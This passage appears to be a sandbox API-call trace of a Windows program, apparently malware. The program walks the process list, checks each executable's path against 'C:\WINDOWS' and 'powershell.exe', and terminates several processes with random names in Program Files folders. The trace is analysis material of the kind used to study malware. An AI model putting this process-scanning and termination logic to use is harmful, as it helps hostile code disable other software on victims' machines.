cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.886] GetCurrentProcessId () returned 0xf00 [0059.886] GetCurrentProcess () returned 0xffffffff [0059.886] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.886] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x69c) returned 0x0 [0059.886] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0059.887] GetCurrentProcessId () returned 0xf00 [0059.887] GetCurrentProcess () returned 0xffffffff [0059.887] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.887] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6bc) returned 0x0 [0059.887] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0059.888] GetCurrentProcessId () returned 0xf00 [0059.888] GetCurrentProcess () returned 0xffffffff [0059.888] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.888] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x708) returned 0x3fc [0059.888] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")) returned 0x1e [0059.888] StrStrIW (lpFirst="C:\\Windows\\System32\\sihost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\sihost.exe" [0059.888] CloseHandle (hObject=0x3fc) returned 1 [0059.888] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.889] GetCurrentProcessId () returned 0xf00 [0059.889] GetCurrentProcess () returned 0xffffffff [0059.889] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.889] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x720) returned 0x3fc [0059.889] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0059.889] StrStrIW (lpFirst="C:\\Windows\\System32\\svchost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\svchost.exe" [0059.889] CloseHandle (hObject=0x3fc) returned 1 [0059.889] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0059.890] GetCurrentProcessId () returned 0xf00 [0059.890] GetCurrentProcess () returned 0xffffffff [0059.890] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.890] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x7a0) returned 0x3fc [0059.890] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0059.890] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0059.890] CloseHandle (hObject=0x3fc) returned 1 [0059.890] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0059.891] GetCurrentProcessId () returned 0xf00 [0059.891] GetCurrentProcess () returned 0xffffffff [0059.891] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.891] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0059.892] GetCurrentProcessId () returned 0xf00 [0059.892] GetCurrentProcess () returned 0xffffffff [0059.892] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.892] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x818) returned 0x0 [0059.892] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0059.893] GetCurrentProcessId () returned 0xf00 [0059.893] GetCurrentProcess () returned 0xffffffff [0059.893] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.893] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0059.893] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0059.893] GetCurrentProcessId () returned 0xf00 [0059.893] GetCurrentProcess () returned 0xffffffff [0059.893] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.893] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x8a0) returned 0x0 [0059.893] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0059.894] GetCurrentProcessId () returned 0xf00 [0059.894] GetCurrentProcess () returned 0xffffffff [0059.894] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.894] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb3c) returned 0x3fc [0059.894] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" (normalized: "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe")) returned 0x4f [0059.894] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" [0059.894] CloseHandle (hObject=0x3fc) returned 1 [0059.894] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0059.895] GetCurrentProcessId () returned 0xf00 [0059.895] GetCurrentProcess () returned 0xffffffff [0059.895] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.895] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb60) returned 0x3fc [0059.895] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" (normalized: "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe")) returned 0x4a [0059.895] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" [0059.895] CloseHandle (hObject=0x3fc) returned 1 [0059.895] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0059.896] GetCurrentProcessId () returned 0xf00 [0059.896] GetCurrentProcess () returned 0xffffffff [0059.896] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.896] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbe4) returned 0x3fc [0059.896] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")) returned 0x25 [0059.896] StrStrIW (lpFirst="C:\\Windows\\System32\\RuntimeBroker.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\RuntimeBroker.exe" [0059.896] CloseHandle (hObject=0x3fc) returned 1 [0059.896] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0059.896] GetCurrentProcessId () returned 0xf00 [0059.897] GetCurrentProcess () returned 0xffffffff [0059.897] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.897] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe0c) returned 0x0 [0059.897] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending-windsor-bouquet.exe")) returned 1 [0059.897] GetCurrentProcessId () returned 0xf00 [0059.897] GetCurrentProcess () returned 0xffffffff [0059.897] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.897] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xfdc) returned 0x3fc [0059.897] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Common Files\\pending-windsor-bouquet.exe" (normalized: "c:\\program files (x86)\\common files\\pending-windsor-bouquet.exe")) returned 0x3f [0059.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\pending-windsor-bouquet.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\pending-windsor-bouquet.exe", lpSrch="powershell.exe") returned 0x0 [0059.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\pending-windsor-bouquet.exe", lpSrch="powershell.exe") returned 0x0 [0059.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\pending-windsor-bouquet.exe", lpSrch="powershell.exe") returned 0x0 [0059.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\pending-windsor-bouquet.exe", lpSrch="powershell.exe") returned 0x0 [0059.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\pending-windsor-bouquet.exe", lpSrch="powershell.exe") returned 0x0 [0059.898] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.898] GetTickCount () returned 0x115074f [0059.898] GetCurrentProcessId () returned 0xf00 [0059.898] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xfdc) returned 0x404 [0059.898] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.898] TerminateProcess (hProcess=0x404, uExitCode=0x115074f) returned 1 [0059.902] CloseHandle (hObject=0x404) returned 1 [0059.902] CloseHandle (hObject=0x3fc) returned 1 [0059.902] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist organisations.exe")) returned 1 [0059.903] GetCurrentProcessId () returned 0xf00 [0059.903] GetCurrentProcess () returned 0xffffffff [0059.903] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.903] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xff0) returned 0x3fc [0059.903] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Photo Viewer\\wishlist organisations.exe" (normalized: "c:\\program files\\windows photo viewer\\wishlist organisations.exe")) returned 0x40 [0059.903] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\wishlist organisations.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.903] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\wishlist organisations.exe", lpSrch="powershell.exe") returned 0x0 [0059.903] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\wishlist organisations.exe", lpSrch="powershell.exe") returned 0x0 [0059.903] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\wishlist organisations.exe", lpSrch="powershell.exe") returned 0x0 [0059.903] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\wishlist organisations.exe", lpSrch="powershell.exe") returned 0x0 [0059.903] StrStrIW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\wishlist organisations.exe", lpSrch="powershell.exe") returned 0x0 [0059.903] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.903] GetTickCount () returned 0x115074f [0059.904] GetCurrentProcessId () returned 0xf00 [0059.904] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xff0) returned 0x404 [0059.904] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.904] TerminateProcess (hProcess=0x404, uExitCode=0x115074f) returned 1 [0059.906] CloseHandle (hObject=0x404) returned 1 [0059.907] CloseHandle (hObject=0x3fc) returned 1 [0059.907] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pichuntermia.exe")) returned 1 [0059.907] GetCurrentProcessId () returned 0xf00 [0059.907] GetCurrentProcess () returned 0xffffffff [0059.907] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.907] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x764) returned 0x3fc [0059.908] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Java\\pichuntermia.exe" (normalized: "c:\\program files\\java\\pichuntermia.exe")) returned 0x26 [0059.908] StrStrIW (lpFirst="C:\\Program Files\\Java\\pichuntermia.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.908] StrStrIW (lpFirst="C:\\Program Files\\Java\\pichuntermia.exe", lpSrch="powershell.exe") returned 0x0 [0059.908] StrStrIW (lpFirst="C:\\Program Files\\Java\\pichuntermia.exe", lpSrch="powershell.exe") returned 0x0 [0059.908] StrStrIW (lpFirst="C:\\Program Files\\Java\\pichuntermia.exe", lpSrch="powershell.exe") returned 0x0 [0059.908] StrStrIW (lpFirst="C:\\Program Files\\Java\\pichuntermia.exe", lpSrch="powershell.exe") returned 0x0 [0059.908] StrStrIW (lpFirst="C:\\Program Files\\Java\\pichuntermia.exe", lpSrch="powershell.exe") returned 0x0 [0059.908] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.908] GetTickCount () returned 0x115075f [0059.908] GetCurrentProcessId () returned 0xf00 [0059.908] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x764) returned 0x404 [0059.908] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.908] TerminateProcess (hProcess=0x404, uExitCode=0x115075f) returned 1 [0059.911] CloseHandle (hObject=0x404) returned 1 [0059.911] CloseHandle (hObject=0x3fc) returned 1 [0059.911] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="endedvietnamesemature.exe")) returned 1 [0059.911] GetCurrentProcessId () returned 0xf00 [0059.911] GetCurrentProcess () returned 0xffffffff [0059.911] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.911] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x4fc) returned 0x3fc [0059.912] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Sidebar\\endedvietnamesemature.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\endedvietnamesemature.exe")) returned 0x40 [0059.912] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\endedvietnamesemature.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.912] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\endedvietnamesemature.exe", lpSrch="powershell.exe") returned 0x0 [0059.912] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\endedvietnamesemature.exe", lpSrch="powershell.exe") returned 0x0 [0059.912] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\endedvietnamesemature.exe", lpSrch="powershell.exe") returned 0x0 [0059.912] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\endedvietnamesemature.exe", lpSrch="powershell.exe") returned 0x0 [0059.912] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\endedvietnamesemature.exe", lpSrch="powershell.exe") returned 0x0 [0059.912] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.912] GetTickCount () returned 0x115075f [0059.912] GetCurrentProcessId () returned 0xf00 [0059.912] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x4fc) returned 0x404 [0059.912] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.912] TerminateProcess (hProcess=0x404, uExitCode=0x115075f) returned 1 [0059.915] CloseHandle (hObject=0x404) returned 1 [0059.915] CloseHandle (hObject=0x3fc) returned 1 [0059.915] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="drivesaerospace.exe")) returned 1 [0059.915] GetCurrentProcessId () returned 0xf00 [0059.915] GetCurrentProcess () returned 0xffffffff [0059.916] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.916] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x50c) returned 0x3fc [0059.916] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Office\\drivesaerospace.exe" (normalized: "c:\\program files (x86)\\microsoft office\\drivesaerospace.exe")) returned 0x3b [0059.916] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\drivesaerospace.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0059.916] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\drivesaerospace.exe", lpSrch="powershell.exe") returned 0x0 [0059.916] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\drivesaerospace.exe", lpSrch="powershell.exe") returned 0x0 [0059.916] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\drivesaerospace.exe", lpSrch="powershell.exe") returned 0x0 [0059.916] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\drivesaerospace.exe", lpSrch="powershell.exe") returned 0x0 [0059.916] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\drivesaerospace.exe", lpSrch="powershell.exe") returned 0x0 [0059.916] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0059.916] GetTickCount () returned 0x115075f [0059.916] GetCurrentProcessId () returned 0xf00 [0059.916] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x50c) returned 0x404 [0059.916] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.916] TerminateProcess (hProcess=0x404, uExitCode=0x115075f) returned 1 [0059.922] CloseHandle (hObject=0x404) returned 1 [0059.922] CloseHandle (hObject=0x3fc) returned 1 [0059.922] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful-courts.exe")) returned 1 [0059.922] GetCurrentProcessId () returned 0xf00 [0059.922] GetCurrentProcess () returned 0xffffffff [0059.922] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0059.922] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xce8) returned 0x3fc [0059.922] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Media 